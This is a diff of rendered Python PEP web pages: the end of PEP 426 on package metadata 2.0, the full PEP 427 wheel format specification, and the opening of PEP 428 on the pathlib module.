A documentation toolchain dependency like Sphinx would either go in the +build extra (for example, if man pages were included in the +built distribution) or in the doc extra (for example, if the +documentation is published solely through Read the Docs or the +project website). This would be enough to allow an automated converter +to map it to an appropriate dependency in the spec file.

+

If the project did define any extras, those could be mapped to additional +virtual RPMs with appropriate BuildRequires and Requires entries based on +the details of the dependency specifications. Alternatively, they could +be mapped to other system package manager features (such as weak dependencies).

+

The metadata extension format should also provide a way for distribution +specific hints to be included in the upstream project metadata without needing +to manually duplicate any of the upstream metadata in a distribution specific +format.

+
+
+

Appendix C: Summary of differences from PEP 345

+
    +
  • Metadata-Version is now 2.0, with semantics specified for handling +version changes
  • +
  • The increasingly complex ad hoc “Key: Value” format has been replaced by +a more structured JSON compatible format that is easily represented as +Python dictionaries, strings, lists.
  • +
  • Most fields are now optional and filling in dummy data for omitted fields +is explicitly disallowed
  • +
  • Explicit permission for in-place clarifications without releasing a new +version of the specification
  • +
  • The PEP now attempts to provide more of an explanation of why the fields +exist and how they are intended to be used, rather than being a simple +description of the permitted contents
  • +
  • Changed the version scheme to be based on PEP 440 rather than PEP 386
  • +
  • Added the source label mechanism as described in PEP 440
  • +
  • Formally defined dependency declarations, extras, and environment markers +in PEP 508
  • +
  • Support for different kinds of dependencies through additional reserved +extra names
  • +
  • Updated obsolescence mechanism
  • +
  • A well-defined metadata extension mechanism, and migration of any fields +not needed for dependency resolution to standard extensions
  • +
  • With all due respect to Charles Schulz and Peanuts, many of the examples +have been updated to be more thematically appropriate for Python ;)
  • +
+

The rationale for major changes is given in the following sections.

+
+

Metadata-Version semantics

+

The semantics of major and minor version increments are now specified, +and follow the same model as the format version semantics specified for +the wheel format in PEP 427: minor version increments must behave +reasonably when processed by a tool that only understand earlier metadata +versions with the same major version, while major version increments +may include changes that are not compatible with existing tools.

+

The major version number of the specification has been incremented +accordingly, as interpreting PEP 426 metadata obviously cannot be +interpreted in accordance with earlier metadata specifications.

+

Whenever the major version number of the specification is incremented, it +is expected that deployment will take some time, as either metadata +consuming tools must be updated before other tools can safely start +producing the new format, or else the sdist and wheel formats, along with +the installation database definition, will need to be updated to support +provision of multiple versions of the metadata in parallel.

+

Existing tools won’t abide by this guideline until they’re updated to +support the new metadata standard, so the new semantics will first take +effect for a hypothetical 2.x -> 3.0 transition. For the 1.x -> 2.x +transition, we will use the approach where tools continue to produce the +existing supplementary files (such as entry_points.txt) in addition +to any equivalents specified using the new features of the standard +metadata format (including the formal extension mechanism).

+
+
+

Switching to a JSON compatible format

+

The old “Key:Value” format was becoming increasingly limiting, with various +complexities like parsers needing to know which fields were permitted to +occur more than once, which fields supported the environment marker +syntax (with an optional ";" to separate the value from the marker) and +eventually even the option to embed arbitrary JSON inside particular +subfields.

+

The old serialisation format also wasn’t amenable to easy conversion to +standard Python data structures for use in any new install hook APIs, or +in future extensions to the runtime importer APIs to allow them to provide +information for inclusion in the installation database.

+

Accordingly, we’ve taken the step of switching to a JSON-compatible metadata +format. This works better for APIs and is much easier for tools to parse and +generate correctly. Changing the name of the metadata file also makes it +easy to distribute 1.x and 2.x metadata in parallel, greatly simplifying +several aspects of the migration to the new metadata format.

+

The specific choice of pydist.json as the preferred file name relates +to the fact that the metadata described in these files applies to the +distribution as a whole, rather than to any particular build. Additional +metadata formats may be defined in the future to hold information that can +only be determined after building a binary distribution for a particular +target environment.

+
+
+

Changing the version scheme

+

See PEP 440 for a detailed rationale for the various changes made to the +versioning scheme.

+
+
+

Source labels

+

The new source label support is intended to make it clearer that the +constraints on public version identifiers are there primarily to aid in +the creation of reliable automated dependency analysis tools. Projects +are free to use whatever versioning scheme they like internally, so long +as they are able to translate it to something the dependency analysis tools +will understand.

+

Source labels also make it straightforward to record specific details of a +version, like a hash or tag name that allows the release to be reconstructed +from the project version control system.

+
+
+

Support for optional dependencies for distributions

+

The new extras system allows distributions to declare optional +behaviour, and to use the dependency fields to indicate when +particular dependencies are needed only to support that behaviour. It is +derived from the equivalent system that is already in widespread use as +part of setuptools and allows that aspect of the legacy setuptools +metadata to be accurately represented in the new metadata format.

+

The additions to the extras syntax relative to setuptools are defined to +make it easier to express the various possible combinations of dependencies, +in particular those associated with build systems (with optional support +for running the test suite) and development systems.

+
+
+

Support for different kinds of semantic dependencies

+

The separation of the five different kinds of dependency through the Extras +system allows a project to optionally indicate whether a dependency is needed +specifically to develop, build, test or use the distribution.

+

The advantage of having these distinctions supported in the upstream Python +specific metadata is that even if a project doesn’t care about these +distinction themselves, they may be more amenable to patches from +downstream redistributors that separate the fields appropriately. Over time, +this should allow much greater control over where and when particular +dependencies end up being installed.

+
+
+

Support for metadata extensions

+

The new extension effectively allows sections of the metadata +namespace to be delegated to other projects, while preserving a +standard overall format metadata format for easy of processing by +distribution tools that do not support a particular extension.

+

It also works well in combination with the new build extra +to allow a distribution to depend on tools which do know how to handle +the chosen extension, and the new extras mechanism in general, allowing +support for particular extensions to be provided as optional features.

+

Possible future uses for extensions include declaration of plugins for +other projects and hints for automatic conversion to Linux system +packages.

+

The ability to declare an extension as required is included primarily to +allow the definition of the metadata hooks extension to be deferred until +some time after the initial adoption of the metadata 2.0 specification. If +a release needs a postinstall hook to run in order to complete +the installation successfully, then earlier versions of tools should fall +back to installing from source rather than installing from a wheel file and +then failing to run the expected postinstall hook.

+
+
+
+

Appendix D: Deferred features

+

Several potentially useful features have been deliberately deferred in +order to better prioritise our efforts in migrating to the new metadata +standard. These all reflect information that may be nice to have in the +new metadata, but which can be readily added through metadata extensions or +in metadata 2.1 without breaking any use cases already supported by metadata +2.0.

+

Once the pypi, setuptools, pip, wheel and distlib +projects support creation and consumption of metadata 2.0, then we may +revisit the creation of metadata 2.1 with some or all of these additional +features.

+
+

Standard extensions

+

Some of the information provided by the legacy metadata system has been +moved out to standard extensions defined in PEP 459.

+

This allows publication of the core dependency metadata in a more readily +consumable format to proceed even before the full details of those extensions +have been resolved.

+
+
+

Improved handling of project obsolescence, renames and mergers

+

Earlier drafts of this PEP included new Provides and Obsoleted-By +fields for more robust automated notifications and tracking of project +obsolescence, renames and mergers.

+

This isn’t an essential feature of a dependency management system, and has +been deferred indefinitely as a possible future metadata extension.

+
+
+

MIME type registration

+

At some point after acceptance of the PEP, we may submit the +following MIME type registration request to IANA:

+
    +
  • application/vnd.python.pydist+json
  • +
+

It’s even possible we may be able to just register the vnd.python +namespace under the banner of the PSF rather than having to register +the individual subformats.

+
+
+

String methods in environment markers

+

Supporting at least “.startswith” and “.endswith” string methods in +environment markers would allow some conditions to be written more +naturally. For example, "sys.platform.startswith('win')" is a +somewhat more intuitive way to mark Windows specific dependencies, +since "'win' in sys.platform" is incorrect thanks to cygwin +and the fact that 64-bit Windows still shows up as win32 is more +than a little strange.

+
+
+
+

Appendix E: Rejected features

+

The following features have been explicitly considered and rejected as +introducing too much additional complexity for too small a gain in +expressiveness.

+
+

Separate lists for conditional and unconditional dependencies

+

Earlier versions of this PEP used separate lists for conditional and +unconditional dependencies. This turned out to be annoying to handle in +automated tools and removing it also made the PEP and metadata schema +substantially shorter, suggesting it was actually harder to explain as well.

+
+
+

Separate lists for semantic dependencies

+

Earlier versions of this PEP used separate fields rather than the extras +system for test, build, documentation, and development dependencies. This +turned out to be annoying to handle in automated tools and removing it also +made the PEP and metadata schema substantially shorter, suggesting it was +actually harder to explain as well.

+
+
+

Introducing friction for overly precise dependency declarations

+

Earlier versions of this PEP attempted to introduce friction into the +inappropriate use of overly strict dependency declarations in published +releases. Discussion on distutils-sig came to the conclusion that wasn’t +a serious enough problem to tackle directly at the interoperability +specification layer, and if it does become a problem in the future, +it would be better tackled at the point where projects are uploaded to +the public Python Package Index.

+
+
+

Disallowing underscores in distribution names

+

Debian doesn’t actually permit underscores in names, but that seems +unduly restrictive for this spec given the common practice of using +valid Python identifiers as Python distribution names. A Debian side +policy of converting underscores to hyphens seems easy enough to +implement (and the requirement to consider hyphens and underscores as +equivalent ensures that doing so won’t introduce any name conflicts).

+
+
+

Allowing the use of Unicode in distribution names

+

This PEP deliberately avoids following Python 3 down the path of arbitrary +Unicode identifiers, as the security implications of doing so are +substantially worse in the software distribution use case (it opens +up far more interesting attack vectors than mere code obfuscation).

+

In addition, the existing tools really only work properly if you restrict +names to ASCII and changing that would require a lot of work for all +the automated tools in the chain.

+

It may be reasonable to revisit this question at some point in the (distant) +future, but setting up a more reliable software distribution system is +challenging enough without adding more general Unicode identifier support +into the mix.

+
+
+

Depending on source labels

+

There is no mechanism to express a dependency on a source label - they +are included in the metadata for internal project reference only. Instead, +dependencies must be expressed in terms of either public versions or else +direct URL references.

+
+
+

Alternative dependencies

+

An earlier draft of this PEP considered allowing lists in place of the +usual strings in dependency specifications to indicate that there are +multiple ways to satisfy a dependency.

+

If at least one of the individual dependencies was already available, then +the entire dependency would be considered satisfied, otherwise the first +entry would be added to the dependency set.

+

Alternative dependency specification example:

+
["Pillow", "PIL"]
+["mysql", "psycopg2 >= 4", "sqlite3"]
+
+
+

However, neither of the given examples is particularly compelling, +since Pillow/PIL style forks aren’t common, and the database driver use +case would arguably be better served by an SQL Alchemy defined “supported +database driver” metadata extension where a project depends on SQL Alchemy, +and then declares in the extension which database drivers are checked for +compatibility by the upstream project.

+
+
+

Compatible release comparisons in environment markers

+

PEP 440 defines a rich syntax for version comparisons that could +potentially be useful with python_version and python_full_version +in environment markers. However, allowing the full syntax would mean +environment markers are no longer a Python subset, while allowing +only some of the comparisons would introduce yet another special case +to handle.

+

Given that environment markers are only used in cases where a higher level +“or” is implied by the metadata structure, it seems easier to require the +use of multiple comparisons against specific Python versions for the rare +cases where this would be useful.

+
+
+

Conditional provides

+

Under the revised metadata design, conditional “provides” based on runtime +features or the environment would go in a separate “may_provide” field. +However, it isn’t clear there’s any use case for doing that, so the idea +is rejected unless someone can present a compelling use case (and even then +the idea won’t be reconsidered until metadata 2.1 at the earliest).

+
+
+
+

References

+

This document specifies version 2.0 of the metadata format. +Version 1.0 is specified in PEP 241. +Version 1.1 is specified in PEP 314. +Version 1.2 is specified in PEP 345.

+

The initial attempt at a standardised version scheme, along with the +justifications for needing such a standard can be found in PEP 386.

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0426.rst

+

Last modified: 2024-10-06 16:27:00 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0427/index.html b/pep-0427/index.html new file mode 100644 index 00000000000..22e5a6a5dfa --- /dev/null +++ b/pep-0427/index.html @@ -0,0 +1,614 @@ + + + + + + + + PEP 427 – The Wheel Binary Package Format 1.0 | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 427 – The Wheel Binary Package Format 1.0

+
+
Author:
+
Daniel Holth <dholth at gmail.com>
+
BDFL-Delegate:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
20-Sep-2012
+
Post-History:
+
18-Oct-2012, 15-Feb-2013
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document. The up-to-date, canonical spec, Binary distribution format, is maintained on the PyPA specs page.

+

×

+

See the PyPA specification update process for how to propose changes.

+
+
+

Abstract

+

This PEP describes a built-package format for Python called “wheel”.

+

A wheel is a ZIP-format archive with a specially formatted file name and +the .whl extension. It contains a single distribution nearly as it +would be installed according to PEP 376 with a particular installation +scheme. Although a specialized installer is recommended, a wheel file +may be installed by simply unpacking into site-packages with the standard +‘unzip’ tool while preserving enough information to spread its contents +out onto their final paths at any later time.

+
+
+

PEP Acceptance

+

This PEP was accepted, and the defined wheel version updated to 1.0, by +Alyssa Coghlan on 16th February, 2013 [1]

+
+
+

Rationale

+

Python needs a package format that is easier to install than sdist. +Python’s sdist packages are defined by and require the distutils and +setuptools build systems, running arbitrary code to build-and-install, +and re-compile, code just so it can be installed into a new +virtualenv. This system of conflating build-install is slow, hard to +maintain, and hinders innovation in both build systems and installers.

+

Wheel attempts to remedy these problems by providing a simpler +interface between the build system and the installer. The wheel +binary package format frees installers from having to know about the +build system, saves time by amortizing compile time over many +installations, and removes the need to install a build system in the +target environment.

+
+
+

Details

+
+

Installing a wheel ‘distribution-1.0-py32-none-any.whl’

+

Wheel installation notionally consists of two phases:

+
    +
  • Unpack.
      +
    1. Parse distribution-1.0.dist-info/WHEEL.
    2. +
    3. Check that installer is compatible with Wheel-Version. Warn if +minor version is greater, abort if major version is greater.
    4. +
    5. If Root-Is-Purelib == ‘true’, unpack archive into purelib +(site-packages).
    6. +
    7. Else unpack archive into platlib (site-packages).
    8. +
    +
  • +
  • Spread.
      +
    1. Unpacked archive includes distribution-1.0.dist-info/ and (if +there is data) distribution-1.0.data/.
    2. +
    3. Move each subtree of distribution-1.0.data/ onto its +destination path. Each subdirectory of distribution-1.0.data/ +is a key into a dict of destination directories, such as +distribution-1.0.data/(purelib|platlib|headers|scripts|data). +The initially supported paths are taken from +distutils.command.install.
    4. +
    5. If applicable, update scripts starting with #!python to point +to the correct interpreter.
    6. +
    7. Update distribution-1.0.dist-info/RECORD with the installed +paths.
    8. +
    9. Remove empty distribution-1.0.data directory.
    10. +
    11. Compile any installed .py to .pyc. (Uninstallers should be smart +enough to remove .pyc even if it is not mentioned in RECORD.)
    12. +
    +
  • +
+ + +
+
+

File Format

+
+

File name convention

+

The wheel filename is {distribution}-{version}(-{build +tag})?-{python tag}-{abi tag}-{platform tag}.whl.

+
+
distribution
Distribution name, e.g. ‘django’, ‘pyramid’.
+
version
Distribution version, e.g. 1.0.
+
build tag
Optional build number. Must start with a digit. Acts as a +tie-breaker if two wheel file names are the same in all other +respects (i.e. name, version, and other tags). Sort as an +empty tuple if unspecified, else sort as a two-item tuple with +the first item being the initial digits as an int, and the +second item being the remainder of the tag as a str.
+
language implementation and version tag
E.g. ‘py27’, ‘py2’, ‘py3’.
+
abi tag
E.g. ‘cp33m’, ‘abi3’, ‘none’.
+
platform tag
E.g. ‘linux_x86_64’, ‘any’.
+
+

For example, distribution-1.0-1-py27-none-any.whl is the first +build of a package called ‘distribution’, and is compatible with +Python 2.7 (any Python 2.7 implementation), with no ABI (pure Python), +on any CPU architecture.

+

The last three components of the filename before the extension are +called “compatibility tags.” The compatibility tags express the +package’s basic interpreter requirements and are detailed in PEP 425.

+
+
+

Escaping and Unicode

+

Each component of the filename is escaped by replacing runs of +non-alphanumeric characters with an underscore _:

+
re.sub("[^\w\d.]+", "_", distribution, re.UNICODE)
+
+
+

The archive filename is Unicode. It will be some time before the tools +are updated to support non-ASCII filenames, but they are supported in +this specification.

+

The filenames inside the archive are encoded as UTF-8. Although some +ZIP clients in common use do not properly display UTF-8 filenames, +the encoding is supported by both the ZIP specification and Python’s +zipfile.

+
+
+

File contents

+

The contents of a wheel file, where {distribution} is replaced with the +name of the package, e.g. beaglevote and {version} is replaced with +its version, e.g. 1.0.0, consist of:

+
    +
  1. /, the root of the archive, contains all files to be installed in +purelib or platlib as specified in WHEEL. purelib and +platlib are usually both site-packages.
  2. +
  3. {distribution}-{version}.dist-info/ contains metadata.
  4. +
  5. {distribution}-{version}.data/ contains one subdirectory +for each non-empty install scheme key not already covered, where +the subdirectory name is an index into a dictionary of install paths +(e.g. data, scripts, headers, purelib, platlib).
  6. +
  7. Python scripts must appear in scripts and begin with exactly +b'#!python' in order to enjoy script wrapper generation and +#!python rewriting at install time. They may have any or no +extension.
  8. +
  9. {distribution}-{version}.dist-info/METADATA is Metadata version 1.1 +or greater format metadata.
  10. +
  11. {distribution}-{version}.dist-info/WHEEL is metadata about the archive +itself in the same basic key: value format:
    Wheel-Version: 1.0
    +Generator: bdist_wheel 1.0
    +Root-Is-Purelib: true
    +Tag: py2-none-any
    +Tag: py3-none-any
    +Build: 1
    +
    +
    +
  12. +
  13. Wheel-Version is the version number of the Wheel specification.
  14. +
  15. Generator is the name and optionally the version of the software +that produced the archive.
  16. +
  17. Root-Is-Purelib is true if the top level directory of the archive +should be installed into purelib; otherwise the root should be installed +into platlib.
  18. +
  19. Tag is the wheel’s expanded compatibility tags; in the example the +filename would contain py2.py3-none-any.
  20. +
  21. Build is the build number and is omitted if there is no build number.
  22. +
  23. A wheel installer should warn if Wheel-Version is greater than the +version it supports, and must fail if Wheel-Version has a greater +major version than the version it supports.
  24. +
  25. Wheel, being an installation format that is intended to work across +multiple versions of Python, does not generally include .pyc files.
  26. +
  27. Wheel does not contain setup.py or setup.cfg.
  28. +
+

This version of the wheel specification is based on the distutils install +schemes and does not define how to install files to other locations. +The layout offers a superset of the functionality provided by the existing +wininst and egg binary formats.

+
+
The .dist-info directory
+
    +
  1. Wheel .dist-info directories include at a minimum METADATA, WHEEL, +and RECORD.
  2. +
  3. METADATA is the package metadata, the same format as PKG-INFO as +found at the root of sdists.
  4. +
  5. WHEEL is the wheel metadata specific to a build of the package.
  6. +
  7. RECORD is a list of (almost) all the files in the wheel and their +secure hashes. Unlike PEP 376, every file except RECORD, which +cannot contain a hash of itself, must include its hash. The hash +algorithm must be sha256 or better; specifically, md5 and sha1 are +not permitted, as signed wheel files rely on the strong hashes in +RECORD to validate the integrity of the archive.
  8. +
  9. PEP 376’s INSTALLER and REQUESTED are not included in the archive.
  10. +
  11. RECORD.jws is used for digital signatures. It is not mentioned in +RECORD.
  12. +
  13. RECORD.p7s is allowed as a courtesy to anyone who would prefer to +use S/MIME signatures to secure their wheel files. It is not +mentioned in RECORD.
  14. +
  15. During extraction, wheel installers verify all the hashes in RECORD +against the file contents. Apart from RECORD and its signatures, +installation will fail if any file in the archive is not both +mentioned and correctly hashed in RECORD.
  16. +
+
+
+
The .data directory
+

Any file that is not normally installed inside site-packages goes into +the .data directory, named as the .dist-info directory but with the +.data/ extension:

+
distribution-1.0.dist-info/
+
+distribution-1.0.data/
+
+
+

The .data directory contains subdirectories with the scripts, headers, +documentation and so forth from the distribution. During installation the +contents of these subdirectories are moved onto their destination paths.

+
+
+
+
+

Signed wheel files

+

Wheel files include an extended RECORD that enables digital +signatures. PEP 376’s RECORD is altered to include a secure hash +digestname=urlsafe_b64encode_nopad(digest) (urlsafe base64 +encoding with no trailing = characters) as the second column instead +of an md5sum. All possible entries are hashed, including any +generated files such as .pyc files, but not RECORD which cannot contain its +own hash. For example:

+
file.py,sha256=AVTFPZpEKzuHr7OvQZmhaU3LvwKz06AJw8mT\_pNh2yI,3144
+distribution-1.0.dist-info/RECORD,,
+
+
+

The signature file(s) RECORD.jws and RECORD.p7s are not mentioned in +RECORD at all since they can only be added after RECORD is generated. +Every other file in the archive must have a correct hash in RECORD +or the installation will fail.

+

If JSON web signatures are used, one or more JSON Web Signature JSON +Serialization (JWS-JS) signatures is stored in a file RECORD.jws adjacent +to RECORD. JWS is used to sign RECORD by including the SHA-256 hash of +RECORD as the signature’s JSON payload:

+
{ "hash": "sha256=ADD-r2urObZHcxBW3Cr-vDCu5RJwT4CaRTHiFmbcIYY" }
+
+
+

(The hash value is the same format used in RECORD.)

+

If RECORD.p7s is used, it must contain a detached S/MIME format signature +of RECORD.

+

A wheel installer is not required to understand digital signatures but +MUST verify the hashes in RECORD against the extracted file contents. +When the installer checks file hashes against RECORD, a separate signature +checker only needs to establish that RECORD matches the signature.

+

See

+ +
+
+

Comparison to .egg

+
    +
  1. Wheel is an installation format; egg is importable. Wheel archives +do not need to include .pyc and are less tied to a specific Python +version or implementation. Wheel can install (pure Python) packages +built with previous versions of Python so you don’t always have to +wait for the packager to catch up.
  2. +
  3. Wheel uses .dist-info directories; egg uses .egg-info. Wheel is +compatible with the new world of Python packaging and the new +concepts it brings.
  4. +
  5. Wheel has a richer file naming convention for today’s +multi-implementation world. A single wheel archive can indicate +its compatibility with a number of Python language versions and +implementations, ABIs, and system architectures. Historically the +ABI has been specific to a CPython release, wheel is ready for the +stable ABI.
  6. +
  7. Wheel is lossless. The first wheel implementation bdist_wheel +always generates egg-info, and then converts it to a .whl. It is +also possible to convert existing eggs and bdist_wininst +distributions.
  8. +
  9. Wheel is versioned. Every wheel file contains the version of the +wheel specification and the implementation that packaged it. +Hopefully the next migration can simply be to Wheel 2.0.
  10. +
  11. Wheel is a reference to the other Python.
  12. +
+
+
+
+

FAQ

+
+

Wheel defines a .data directory. Should I put all my data there?

+
+
This specification does not have an opinion on how you should organize +your code. The .data directory is just a place for any files that are +not normally installed inside site-packages or on the PYTHONPATH. +In other words, you may continue to use pkgutil.get_data(package, +resource) even though those files will usually not be distributed +in wheel’s .data directory.
+
+
+

Why does wheel include attached signatures?

+
+
Attached signatures are more convenient than detached signatures +because they travel with the archive. Since only the individual files +are signed, the archive can be recompressed without invalidating +the signature or individual files can be verified without having +to download the whole archive.
+
+
+

Why does wheel allow JWS signatures?

+
+
The JOSE specifications of which JWS is a part are designed to be easy +to implement, a feature that is also one of wheel’s primary design +goals. JWS yields a useful, concise pure-Python implementation.
+
+
+

Why does wheel also allow S/MIME signatures?

+
+
S/MIME signatures are allowed for users who need or want to use +existing public key infrastructure with wheel.

Signed packages are only a basic building block in a secure package +update system. Wheel only provides the building block.

+
+
+
+

What’s the deal with “purelib” vs. “platlib”?

+
+
Wheel preserves the “purelib” vs. “platlib” distinction, which is +significant on some platforms. For example, Fedora installs pure +Python packages to ‘/usr/lib/pythonX.Y/site-packages’ and platform +dependent packages to ‘/usr/lib64/pythonX.Y/site-packages’.

A wheel with “Root-Is-Purelib: false” with all its files +in {name}-{version}.data/purelib is equivalent to a wheel with +“Root-Is-Purelib: true” with those same files in the root, and it +is legal to have files in both the “purelib” and “platlib” categories.

+

In practice a wheel should have only one of “purelib” or “platlib” +depending on whether it is pure Python or not and those files should +be at the root with the appropriate setting given for “Root-is-purelib”.

+
+
+
+

Is it possible to import Python code directly from a wheel file?

+
+
Technically, due to the combination of supporting installation via +simple extraction and using an archive format that is compatible with +zipimport, a subset of wheel files do support being placed directly +on sys.path. However, while this behaviour is a natural consequence +of the format design, actually relying on it is generally discouraged.

Firstly, wheel is designed primarily as a distribution format, so +skipping the installation step also means deliberately avoiding any +reliance on features that assume full installation (such as being able +to use standard tools like pip and virtualenv to capture and +manage dependencies in a way that can be properly tracked for auditing +and security update purposes, or integrating fully with the standard +build machinery for C extensions by publishing header files in the +appropriate place).

+

Secondly, while some Python software is written to support running +directly from a zip archive, it is still common for code to be written +assuming it has been fully installed. When that assumption is broken +by trying to run the software from a zip archive, the failures can often +be obscure and hard to diagnose (especially when they occur in third +party libraries). The two most common sources of problems with this +are the fact that importing C extensions from a zip archive is not +supported by CPython (since doing so is not supported directly by the +dynamic loading machinery on any platform) and that when running from +a zip archive the __file__ attribute no longer refers to an +ordinary filesystem path, but to a combination path that includes +both the location of the zip archive on the filesystem and the +relative path to the module inside the archive. Even when software +correctly uses the abstract resource APIs internally, interfacing with +external components may still require the availability of an actual +on-disk file.

+

Like metaclasses, monkeypatching and metapath importers, if you’re not +already sure you need to take advantage of this feature, you almost +certainly don’t need it. If you do decide to use it anyway, be +aware that many projects will require a failure to be reproduced with +a fully installed package before accepting it as a genuine bug.

+
+
+
+
+

References

+ +
+
+

Appendix

+

Example urlsafe-base64-nopad implementation:

+
# urlsafe-base64-nopad for Python 3
+import base64
+
+def urlsafe_b64encode_nopad(data):
+    return base64.urlsafe_b64encode(data).rstrip(b'=')
+
+def urlsafe_b64decode_nopad(data):
+    pad = b'=' * (4 - (len(data) & 3))
+    return base64.urlsafe_b64decode(data + pad)
+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0427.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0428/index.html b/pep-0428/index.html new file mode 100644 index 00000000000..29ac3aca163 --- /dev/null +++ b/pep-0428/index.html @@ -0,0 +1,833 @@ + + + + + + + + PEP 428 – The pathlib module – object-oriented filesystem paths | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 428 – The pathlib module – object-oriented filesystem paths

+
+
Author:
+
Antoine Pitrou <solipsis at pitrou.net>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
30-Jul-2012
+
Python-Version:
+
3.4
+
Post-History:
+
05-Oct-2012
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes the inclusion of a third-party module, pathlib, in +the standard library. The inclusion is proposed under the provisional +label, as described in PEP 411. Therefore, API changes can be done, +either as part of the PEP process, or after acceptance in the standard +library (and until the provisional label is removed).

+

The aim of this library is to provide a simple hierarchy of classes to +handle filesystem paths and the common operations users do over them.

+
+ +
+

Implementation

+

The implementation of this proposal is tracked in the pep428 branch +of pathlib’s Mercurial repository.

+
+
+

Why an object-oriented API

+

The rationale to represent filesystem paths using dedicated classes is the +same as for other kinds of stateless objects, such as dates, times or IP +addresses. Python has been slowly moving away from strictly replicating +the C language’s APIs to providing better, more helpful abstractions around +all kinds of common functionality. Even if this PEP isn’t accepted, it is +likely that another form of filesystem handling abstraction will be adopted +one day into the standard library.

+

Indeed, many people will prefer handling dates and times using the high-level +objects provided by the datetime module, rather than using numeric +timestamps and the time module API. Moreover, using a dedicated class +allows to enable desirable behaviours by default, for example the case +insensitivity of Windows paths.

+
+
+

Proposal

+
+

Class hierarchy

+

The pathlib module implements a simple hierarchy of classes:

+
                +----------+
+                |          |
+       ---------| PurePath |--------
+       |        |          |       |
+       |        +----------+       |
+       |             |             |
+       |             |             |
+       v             |             v
++---------------+    |    +-----------------+
+|               |    |    |                 |
+| PurePosixPath |    |    | PureWindowsPath |
+|               |    |    |                 |
++---------------+    |    +-----------------+
+       |             v             |
+       |          +------+         |
+       |          |      |         |
+       |   -------| Path |------   |
+       |   |      |      |     |   |
+       |   |      +------+     |   |
+       |   |                   |   |
+       |   |                   |   |
+       v   v                   v   v
+  +-----------+           +-------------+
+  |           |           |             |
+  | PosixPath |           | WindowsPath |
+  |           |           |             |
+  +-----------+           +-------------+
+
+
+

This hierarchy divides path classes along two dimensions:

+
    +
  • a path class can be either pure or concrete: pure classes support only +operations that don’t need to do any actual I/O, which are most path +manipulation operations; concrete classes support all the operations +of pure classes, plus operations that do I/O.
  • +
  • a path class is of a given flavour according to the kind of operating +system paths it represents. pathlib implements two flavours: Windows +paths for the filesystem semantics embodied in Windows systems, POSIX +paths for other systems.
  • +
+

Any pure class can be instantiated on any system: for example, you can +manipulate PurePosixPath objects under Windows, PureWindowsPath +objects under Unix, and so on. However, concrete classes can only be +instantiated on a matching system: indeed, it would be error-prone to start +doing I/O with WindowsPath objects under Unix, or vice-versa.

+

Furthermore, there are two base classes which also act as system-dependent +factories: PurePath will instantiate either a PurePosixPath or a +PureWindowsPath depending on the operating system. Similarly, Path +will instantiate either a PosixPath or a WindowsPath.

+

It is expected that, in most uses, using the Path class is adequate, +which is why it has the shortest name of all.

+
+
+

No confusion with builtins

+

In this proposal, the path classes do not derive from a builtin type. This +contrasts with some other Path class proposals which were derived from +str. They also do not pretend to implement the sequence protocol: +if you want a path to act as a sequence, you have to lookup a dedicated +attribute (the parts attribute).

+

The key reasoning behind not inheriting from str is to prevent accidentally +performing operations with a string representing a path and a string that +doesn’t, e.g. path + an_accident. Since operations with a string will not +necessarily lead to a valid or expected file system path, “explicit is better +than implicit” by avoiding accidental operations with strings by not +subclassing it. A blog post by a Python core developer goes into more detail +on the reasons behind this specific design decision.

+
+
+

Immutability

+

Path objects are immutable, which makes them hashable and also prevents a +class of programming errors.

+
+
+

Sane behaviour

+

Little of the functionality from os.path is reused. Many os.path functions +are tied by backwards compatibility to confusing or plain wrong behaviour +(for example, the fact that os.path.abspath() simplifies “..” path +components without resolving symlinks first).

+
+
+

Comparisons

+

Paths of the same flavour are comparable and orderable, whether pure or not:

+
>>> PurePosixPath('a') == PurePosixPath('b')
+False
+>>> PurePosixPath('a') < PurePosixPath('b')
+True
+>>> PurePosixPath('a') == PosixPath('a')
+True
+
+
+

Comparing and ordering Windows path objects is case-insensitive:

+
>>> PureWindowsPath('a') == PureWindowsPath('A')
+True
+
+
+

Paths of different flavours always compare unequal, and cannot be ordered:

+
>>> PurePosixPath('a') == PureWindowsPath('a')
+False
+>>> PurePosixPath('a') < PureWindowsPath('a')
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+TypeError: unorderable types: PurePosixPath() < PureWindowsPath()
+
+
+

Paths compare unequal to, and are not orderable with instances of builtin +types (such as str) and any other types.

+
+
+

Useful notations

+

The API tries to provide useful notations all the while avoiding magic. +Some examples:

+
>>> p = Path('/home/antoine/pathlib/setup.py')
+>>> p.name
+'setup.py'
+>>> p.suffix
+'.py'
+>>> p.root
+'/'
+>>> p.parts
+('/', 'home', 'antoine', 'pathlib', 'setup.py')
+>>> p.relative_to('/home/antoine')
+PosixPath('pathlib/setup.py')
+>>> p.exists()
+True
+
+
+
+
+
+

Pure paths API

+

The philosophy of the PurePath API is to provide a consistent array of +useful path manipulation operations, without exposing a hodge-podge of +functions like os.path does.

+
+

Definitions

+

First a couple of conventions:

+
    +
  • All paths can have a drive and a root. For POSIX paths, the drive is +always empty.
  • +
  • A relative path has neither drive nor root.
  • +
  • A POSIX path is absolute if it has a root. A Windows path is absolute if +it has both a drive and a root. A Windows UNC path (e.g. +\\host\share\myfile.txt) always has a drive and a root +(here, \\host\share and \, respectively).
  • +
  • A path which has either a drive or a root is said to be anchored. +Its anchor is the concatenation of the drive and root. Under POSIX, +“anchored” is the same as “absolute”.
